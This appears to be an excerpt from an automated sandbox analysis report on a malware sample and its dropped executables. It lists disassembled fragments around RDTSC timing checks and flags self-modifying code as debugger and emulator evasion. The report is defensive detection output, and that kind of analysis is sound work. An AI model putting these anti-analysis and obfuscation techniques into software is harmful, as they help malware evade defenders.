Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530094D second address: 530099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1BE4ECC077h 0x0000000a xor cx, B1FEh 0x0000000f jmp 00007F1BE4ECC079h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1BE4ECC06Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530099B second address: 53009AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53009AB second address: 5300A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1BE4ECC079h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F1BE4ECC06Eh 0x00000017 xchg eax, esi 0x00000018 jmp 00007F1BE4ECC070h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1BE4ECC06Ch 0x00000027 adc si, 5818h 0x0000002c jmp 00007F1BE4ECC06Bh 0x00000031 popfd 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300A1C second address: 5300A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300A22 second address: 5300AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push eax 0x0000000b mov bx, C278h 0x0000000f pop ebx 0x00000010 pushfd 0x00000011 jmp 00007F1BE4ECC06Eh 0x00000016 and eax, 2DB1B9A8h 0x0000001c jmp 00007F1BE4ECC06Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 jmp 00007F1BE4ECC076h 0x0000002b sub ebx, ebx 0x0000002d jmp 00007F1BE4ECC071h 0x00000032 test esi, esi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1BE4ECC06Ch 0x0000003b or cx, 4E68h 0x00000040 jmp 00007F1BE4ECC06Bh 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AA5 second address: 5300AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AA9 second address: 5300AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AAD second address: 5300AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F1C5637CCA0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1BE47673D7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AD3 second address: 5300B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 566Ah 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 jmp 00007F1BE4ECC06Dh 0x00000018 mov ecx, esi 0x0000001a jmp 00007F1BE4ECC06Eh 0x0000001f je 00007F1C56AE1906h 0x00000025 pushad 0x00000026 mov cl, 79h 0x00000028 mov bx, 4C6Eh 0x0000002c popad 0x0000002d test byte ptr [76FA6968h], 00000002h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 movzx eax, dx 0x0000003a pushfd 0x0000003b jmp 00007F1BE4ECC073h 0x00000040 xor esi, 18A399CEh 0x00000046 jmp 00007F1BE4ECC079h 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B53 second address: 5300B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B59 second address: 5300B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1C56AE18BBh 0x0000000e jmp 00007F1BE4ECC06Fh 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1BE4ECC070h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B8D second address: 5300B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B9C second address: 5300BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ah, DBh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1BE4ECC078h 0x00000011 mov dword ptr [esp], ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 movsx ebx, ax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BCC second address: 5300BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BE2 second address: 5300BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BE6 second address: 5300BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BEC second address: 5300C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, F3E0h 0x00000011 pushfd 0x00000012 jmp 00007F1BE4ECC079h 0x00000017 sbb ch, FFFFFFE6h 0x0000001a jmp 00007F1BE4ECC071h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 pushad 0x00000024 mov dh, ah 0x00000026 popad 0x00000027 mov dh, 86h 0x00000029 popad 0x0000002a push dword ptr [ebp+14h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300C3F second address: 5300C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300C4E second address: 5300C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300CD1 second address: 5300CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c mov esi, 0AF3E103h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cl, FDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300CFA second address: 5300D66 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC06Bh 0x00000008 sbb ch, FFFFFFAEh 0x0000000b jmp 00007F1BE4ECC079h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 call 00007F1BE4ECC06Ch 0x0000001b pushfd 0x0000001c jmp 00007F1BE4ECC072h 0x00000021 jmp 00007F1BE4ECC075h 0x00000026 popfd 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a mov bx, 7BD2h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C81 second address: 5310C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C8E second address: 5310C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C92 second address: 5310C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C96 second address: 5310C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C9C second address: 5310CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310CA2 second address: 5310CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53109EB second address: 5310A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ah 0x0000000d push ebx 0x0000000e mov al, 50h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A0E second address: 5310A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A12 second address: 5310A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A16 second address: 5310A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A1C second address: 5310A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A22 second address: 5310A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A26 second address: 5310A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1BE47673CEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1BE47673D7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A6B second address: 5310A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A71 second address: 5310A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE47673D0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A97 second address: 5310A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A9B second address: 5310AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53905FA second address: 5390628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BE4ECC06Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538077F second address: 5380783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380783 second address: 5380789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380789 second address: 53807A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53807A6 second address: 5380847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1BE4ECC06Ah 0x00000010 xor esi, 10AD12E8h 0x00000016 jmp 00007F1BE4ECC06Bh 0x0000001b popfd 0x0000001c mov di, si 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F1BE4ECC072h 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1BE4ECC06Eh 0x0000002f or ax, 7078h 0x00000034 jmp 00007F1BE4ECC06Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F1BE4ECC078h 0x00000040 add si, 8AD8h 0x00000045 jmp 00007F1BE4ECC06Bh 0x0000004a popfd 0x0000004b popad 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1BE4ECC070h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380847 second address: 538084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320165 second address: 5320169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320169 second address: 532016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532016D second address: 5320173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D30 second address: 5380D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D34 second address: 5380D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D3A second address: 5380D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D40 second address: 5380D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533060E second address: 533068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1BE47673D3h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 7630FCABh 0x00000012 call 00007F1BE47673D0h 0x00000017 mov ecx, 4BD36A11h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F1BE47673CDh 0x00000025 push FFFFFFFEh 0x00000027 jmp 00007F1BE47673CEh 0x0000002c push 08738E63h 0x00000031 jmp 00007F1BE47673D1h 0x00000036 xor dword ptr [esp], 7E8B4E7Bh 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov edx, 66803D5Eh 0x00000045 mov ax, dx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533068D second address: 53306CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Eh 0x00000008 jmp 00007F1BE4ECC072h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push 1A1EC03Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BE4ECC073h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306CF second address: 53306EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306EC second address: 53306F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53306F2 second address: 5330772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6CF16E3Bh 0x00000012 jmp 00007F1BE47673D6h 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE47673CCh 0x00000025 sbb eax, 3AF5BFA8h 0x0000002b jmp 00007F1BE47673CBh 0x00000030 popfd 0x00000031 mov di, cx 0x00000034 popad 0x00000035 jmp 00007F1BE47673D4h 0x0000003a popad 0x0000003b nop 0x0000003c pushad 0x0000003d mov ax, C2DDh 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pop edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330772 second address: 5330789 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1BE4ECC06Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330789 second address: 5330873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F1BE47673D6h 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007F1BE47673D0h 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F1BE47673D0h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE47673D1h 0x00000025 or eax, 52B6B696h 0x0000002b jmp 00007F1BE47673D1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 call 00007F1BE47673D3h 0x00000039 pushfd 0x0000003a jmp 00007F1BE47673D8h 0x0000003f xor eax, 17857118h 0x00000045 jmp 00007F1BE47673CBh 0x0000004a popfd 0x0000004b pop esi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushfd 0x0000004f jmp 00007F1BE47673CFh 0x00000054 or eax, 043ADDDEh 0x0000005a jmp 00007F1BE47673D9h 0x0000005f popfd 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330873 second address: 53308DB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC070h 0x00000008 xor ax, F5D8h 0x0000000d jmp 00007F1BE4ECC06Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 jmp 00007F1BE4ECC076h 0x0000001c push eax 0x0000001d jmp 00007F1BE4ECC06Bh 0x00000022 xchg eax, esi 0x00000023 jmp 00007F1BE4ECC076h 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308DB second address: 53308DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308DF second address: 53308E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53308E5 second address: 533098F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673D2h 0x00000009 add ch, FFFFFFF8h 0x0000000c jmp 00007F1BE47673CBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 mov dl, al 0x00000019 mov bl, 77h 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d jmp 00007F1BE47673D6h 0x00000022 mov eax, dword ptr [76FAB370h] 0x00000027 jmp 00007F1BE47673D0h 0x0000002c xor dword ptr [ebp-08h], eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1BE47673CEh 0x00000036 add cx, 90E8h 0x0000003b jmp 00007F1BE47673CBh 0x00000040 popfd 0x00000041 push eax 0x00000042 push edx 0x00000043 pushfd 0x00000044 jmp 00007F1BE47673D6h 0x00000049 sbb eax, 43A0A348h 0x0000004f jmp 00007F1BE47673CBh 0x00000054 popfd 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533098F second address: 53309B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC078h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309B4 second address: 53309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309B8 second address: 53309BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309BE second address: 53309C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309C4 second address: 53309C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53309C8 second address: 5330A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1BE47673D6h 0x00000010 sbb cl, 00000038h 0x00000013 jmp 00007F1BE47673CBh 0x00000018 popfd 0x00000019 call 00007F1BE47673D8h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov dword ptr [esp], eax 0x00000025 jmp 00007F1BE47673D7h 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F1BE47673CBh 0x00000036 sbb eax, 0E673B0Eh 0x0000003c jmp 00007F1BE47673D9h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F1BE47673D0h 0x00000048 xor ax, 8188h 0x0000004d jmp 00007F1BE47673CBh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330A83 second address: 5330AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFEE6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFEF72 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CD7679 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D40F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 25EE6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 25EF72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 437679 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4A0F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 8257B0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CEE36 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CF1F8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9CDB93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: 9F3F4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Special instruction interceptor: First address: A5BB78 instructions caused by: Self-modifying code
